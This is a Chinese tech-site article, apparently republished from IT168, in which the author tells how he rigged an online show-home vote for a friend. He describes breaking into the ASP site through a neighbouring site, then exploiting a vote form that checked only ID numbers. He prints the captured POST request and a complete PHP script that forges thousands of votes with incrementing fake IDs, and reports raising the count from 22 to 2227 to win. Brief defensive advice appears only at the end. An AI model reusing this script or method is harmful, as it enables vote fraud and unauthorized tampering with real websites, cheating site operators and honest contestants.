巧妙的投票作弊与严密的防范系统

安全 黑客攻防
前几日朋友找我帮忙.说是在一个网站参加样板房投票竞选.有没有办法帮他刷第一票.心肠好的我自然是答应了.然后朋友发来了网站..看了下是asp的..服务器安全做的还不错..

前几日朋友找我帮忙.说是在一个网站参加样板房投票竞选.有没有办法帮他刷第一票.心肠好的我自然是答应了.然后朋友发来了网站..看了下是asp的..服务器安全做的还不错..没找到任何程序上的漏洞..通过旁注提权入侵进去后.发现管理员真的是很变态..本来打算修改数据库的.刚看了下投票的代码准备找出数据库连接文件.就被管理踢了..接着这事就搁下了..过了几天朋友又催..只好又看了下..才发现所有的漏洞都已经补掉..

还是直接从投票上入手把.希望可以找到突破口直接达到刷票的目的.投票选项如图1.

 
图1

朋友的样板房名为"风 华廊"所以图1中我勾选上了"风·华廊"最多可选10项..其中姓名.联系电话.身份证号码都是虚构的.经过反复投票测试.此投票系统只对身份证号码进行了验证..假设一下身份证号为1234567890.姓名为测试.联系电话:13013011111 只需要把身份证号码改为别的数字.如1234567891就可以再投上一票..并未对IP和cookies进行验证.完全可以达到刷票的目的..

图2是我抓的投票成功的数据包.

 
图1

Aname=%B7%E7%26%238226%3B%BB%AA%C0%C8&username=%B2%E2%CA%D4&tel=13013011111&idcord=1234567890&Submit=%CC%E1%BD%BB

根据数据包构造出URL为

http://www.xxxx.com/ad/20061221/a.asp?action=add&Aname=%B7%E7%26%238226%3B%BB%AA% ... 13013011111&idcord=1234567890&Submit=%CC%E1%BD%BB

直接在IE里打开此页面会出现如图3的提示

 
图1

但只要我们把其中的idcord=1234567890改为idcord=1234567891就会出现投票成功的对话框.知道了投票系统存在的缺陷后..现在就想办法利用程序实现刷票的目的..

写一个发包的程序把idcord设置为一个变量.然后每发送一次数据这个变量得数字就增加一个数.比如idcord=1234567**9循环一次就是idcord=1234567*79自动改变其中的数值..

这样的程序用VB.C.ASP,PHP都不难实现..下面就介绍下PHP的..以下所涉及到的PHP代码为EST的兄弟TTFCT所写.

程序完整代码(目标网站做了相应处理)

{?php
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",2);
print_r(Voting.... );
for($i=0;$i〈=9;$i++)
for($j=0;$j〈=9;$j++)
for($k=0;$k〈=9;$k++)
for($l=0;$l〈=9;$l++)
{
$packet ="POST /ad/20061221/a.asp?action=add HTTP/1.1 \r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */* \r\n";
$packet.="Referer: http//www.xxx.com/ad/20061221/a.asp \r\n";
$packet.="Accept-Language: zh-cn \r\n";
$packet.="Content-Type: application/x-www-form-urlencoded \r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)\r\n";
$packet.="Host: www.xxx.com \r\n";
$packet.="Content-Length: 113 \r\n";
$packet.="Connection: Keep-Alive \r\n";
$packet.="Cache-Control: no-cache \r\n";
$packet.="Cookie: ASPSESSIONIDASDCQDBT=NKKJPDLAMAMNHJHHNBBLOCCH\r\n\r\n";
$packet.="Aname=%B7%E7%26%238226%3B%BB%AA%C0%C8&username=%B2%E2%CA%D4&tel
=13013011111&idcord=1234".$i.$j.$k.$l."90&Submit=%CC%E1%BD%BB\r\n";
if($fp=fsockopen("www.xxx.com",80,$errno,$errstr,50))
if(fwrite($fp,$packet,strlen($packet)))
print_r(

Success to vote
);
sleep(2);
print_r(

Wait for 2 seconds
);
}
?}

懂PHP的朋友一眼就能看出,这只是个发包的程序..其中ini_set("default_socket_timeout",2);为发送数据包的间隔时间为2秒.

for($i=0;$i<=9;$i++)

for($j=0;$j<=9;$j++)

for($k=0;$k<=9;$k++)

for($l=0;$l<=9;$l++)

是设置好的四个变量.在下面的数据包中..idcord=1234".$i.$j.$k.$l."90 自动生成idcord为一个不重复的数值

利用程序写好了..下面就开始刷票..因为是PHP程序..所以要找个支持PHP的空间来运行..就算没有空间只要安装AppServ也一样可以..AppServ可以在http://www.skycn.com/soft/13703.html免费下载到.安装过程很简单的..这里就不说了..

先来看下未刷票前.."风华廊"的票数是多少...

从图4中可以看到是22票..接着我们执行PHP代码..

 
图4

出现"Success to vote"就是投票成功了..

 
图5

因为我设置的是2秒钟投一票..一个小时也就是1800票.所以经过一个多小时后"风华廊"的票数成了2227票.图6

  
图6

朋友的作品理所当然的就拿了第一..而我也因此获得了一顿丰富的午餐.

其实这样的投票程序只要加上cookies验证..一个IP只能投一票..每次投票的间隔时间..等措施就很难作弊了.此文并不是要教大家如何去刷投票.只是想以投票的目的让大家知道是如何刷票的..并在知道刷票的同时怎样去防范它..

责任编辑:小克 来源: IT168
相关推荐

2010-09-30 08:30:01

2011-12-01 09:19:32

数据中心监控系统服务器

2010-09-07 10:44:14

2009-06-26 16:09:53

2010-09-14 22:01:48

2016-10-13 16:20:11

2013-04-27 10:24:03

2015-06-19 13:38:25

2020-11-23 08:30:42

AI

2015-08-04 08:40:28

2010-09-02 20:57:20

2009-07-05 11:27:09

2023-12-26 12:13:31

野指针C++编程

2013-05-13 17:33:10

2011-11-08 09:46:10

2023-10-26 12:10:07

2011-11-21 16:35:46

2012-12-05 17:24:00

2017-03-23 09:13:56

2024-01-17 10:05:09

Python内省反射机制
点赞
收藏

51CTO技术栈公众号